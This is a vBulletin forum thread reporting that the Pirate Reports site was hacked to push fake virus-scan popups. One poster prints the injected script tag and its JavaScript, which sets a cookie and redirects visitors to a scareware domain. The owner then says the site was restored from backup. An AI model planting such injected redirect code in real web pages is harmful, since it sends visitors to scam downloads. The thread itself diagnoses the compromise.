Are you guys aware that Pirate Reports is an attack site?
Pirate Reports?
Collapse
This topic is closed.
X
X
-
Tags: None
-
Eh?
Pirate Reports is the company vB use to pursue illegal users of vBulletin.MARK.B
vBulletin Support
------------
My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
My Unofficial vBulletin Cloud Demo: https://www.adminammo.com -
Ya, i know... but every time i go to their page it brings up one of those "Press here to scan your system! its infected!" messages and trys to auto-download something... my computer is clean of any spyware. i do a daily check.Comment
-
Javascript popup comes up. Not good.MARK.B
vBulletin Support
------------
My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
My Unofficial vBulletin Cloud Demo: https://www.adminammo.comComment
-
It's been hacked (at least I hope not the owners stupid joke).
There's a line in the bottom which calls http://indesignstudioinfo.com/ls.php ...it saves a cookie than redirects to this malware site:
http://www4.suitcase52td.net/?p=p52dcWpkbmqHnc3KbmNToKV1iqHWnG2dXpeYlWhtZZycmA%3D%3D
Definitely a reputation killer.Comment
-
The problem is tht PR has this before close body tag.
HTML Code:<script src="http://indesignstudioinfo.com/ls.php"></script>
Code:function setCookie(c_name,value,expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); document.cookie=c_name+ "=" +escape(value)+ ((expiredays==null) ? "" : ";expires="+exdate.toGMTString()); } function getCookie(c_name){ if (document.cookie.length>0) { c_start=document.cookie.indexOf(c_name + "="); if (c_start!=-1) { c_start=c_start + c_name.length+1; c_end=document.cookie.indexOf(";",c_start); if (c_end==-1) c_end=document.cookie.length; return unescape(document.cookie.substring(c_start,c_end)); } } return ""; } var name=getCookie("pma_visited_theme1"); if (name==""){ setCookie("pma_visited_theme1","1",20); var url="http://www4.suitcase52td.net/?p=p52dcWpkbmqHnc3KbmNToKV1iqHWnG2dXpeYlWhtZZycmA%3D%3D"; window.top.location.replace(url); }else{ }
Comment
-
-
Glad i let you guys know. Doesnt help vbulletin reputation that something they use is a malicious site. ^_^Comment
-
Fortunately Floris has my contact details and those of my network guy and we just uploaded a backup instead resolving the issue.
I think a simple query or even a support ticket might have been a more sensative approach given the circumstance and there is no infection from this sales script it is just scare tactics.Comment
-
Of course we didn't put the script there I think that is obvious we want people to read our site not have a bogus virus scan to scare them into buying software.Comment
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Comment